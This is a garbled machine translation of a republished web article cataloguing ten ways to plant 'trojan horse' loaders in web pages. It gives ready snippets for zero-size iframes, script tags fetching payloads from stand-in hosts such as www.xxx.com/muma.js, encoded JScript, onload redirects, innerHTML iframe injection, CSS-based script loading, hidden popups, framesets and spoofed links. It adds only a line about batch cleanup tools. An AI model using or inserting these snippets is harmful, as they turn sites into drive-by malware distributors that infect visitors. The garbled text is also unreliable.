ASP common Hanging Horse Way Big Summary _ Trojan related

Source: Internet
Author: User
One: Frame hanging horse

<iframe src= Address width=0 height=0></iframe>

Where the "address" can enter a malicious Web site links, etc.

Two: js file hanging Horse

As long as the JS file, can be maliciously modified to be linked to malicious code, generally quoted by the entire station JS code is most likely to be linked to the Trojan, detection we can see the JS code on the left or below, the bad guys like the malicious code and normal code between a lot of space or return to hide, So to see more JS code page has been deliberately elongated and so on.

Three: JS deformation encryption

<script language= "Jscript.encode" src=http://www.xxx.com/muma.txt></script>
Muma.txt can be changed to any suffix


four: Body hanging horse

<body onload= "window.location= ' address"; ></body>

Five: Concealed Hanging horse

Top.document.body.innerHTML = Top.document.body.innerHTML + ' \r\n<iframe src= ' http://www.xxx.com/muma.htm/' > </iframe> ';

Six: The horse hanging in CSS

Body {
Background-image:url (' Javascript:document.write ("<script src=http://www.xxx.net/muma.js></script>")}

This way is more ruthless, but also more difficult to find.

Seven: Jaja Hanging horse

<script language=javascript>
window.open ("Address", "", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1 ");
</script>

Eight: Picture camouflage

<iframe src= "net horse address" height=0 width=0></iframe>
</center>

Nine: Disguise call

<frameset rows= "444,0" cols= "*" >
<frame src= "Open Web page" framborder= "no" scrolling= "Auto" noresize marginwidth= "0" margingheight= "0" >
<frame src= "Net ma address" frameborder= "no" scrolling= "no" noresize marginwidth= "0" margingheight= "0" >
</frameset>

10: Advanced Deception

<a href= "http://www.163.com (confuse connection address, show this address point to Trojan address)" onmouseover= "www_163_com (); return true; " > page to display the content </a>
<script language= "JavaScript" >
function www_163_com ()
{
var url= "net horse address";
Open (URL, "NewWindow", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no," Copyhistory=yes,width=800,height=600,left=10,top=10 ");
}
</SCRIPT>

How to find the above behavior, if more than one page has a horse code, then need to batch replacement tools, recommended that everyone use

Cloud Habitat Community Server channel download (more software can be downloaded to s.jb51.net)
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.